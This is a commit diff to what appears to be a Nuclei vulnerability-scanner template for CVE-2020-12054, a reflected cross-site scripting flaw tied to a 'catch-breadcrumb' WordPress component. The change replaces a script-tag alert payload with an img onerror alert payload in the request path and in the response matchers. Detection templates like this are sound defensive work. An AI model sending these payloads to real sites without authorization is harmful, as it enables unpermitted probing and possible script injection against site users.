Update CVE-2020-12054.yaml
parent
574245af0d
commit
414883f719
|
@ -11,13 +11,13 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "</script><script>alert(document.domain)</script>"
|
- "<img src=x onerror=alert(123);>"
|
||||||
- "catch-breadcrumb"
|
- "catch-breadcrumb"
|
||||||
part: body
|
part: body
|
||||||
condition: and
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue